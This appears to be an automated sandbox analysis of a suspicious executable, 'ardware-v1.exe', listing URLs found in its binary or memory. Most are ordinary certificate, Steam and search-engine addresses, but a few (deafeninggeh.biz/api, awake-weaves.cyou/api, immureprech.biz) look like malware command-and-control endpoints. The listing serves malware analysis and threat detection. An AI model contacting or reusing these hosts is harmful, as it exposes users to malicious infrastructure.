                Source: ardware-v1.exe, 00000000.00000003.2517557532.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2331449931.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521220683.000000000107B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com00
                Source: ardware-v1.exeString found in binary or memory: http://ocsps.ssl.com0?
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstnM
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api8
                Source: ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apiL
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstati
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/puHwl
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/P:
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apie
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz:443/api1
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/pi
                Source: ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
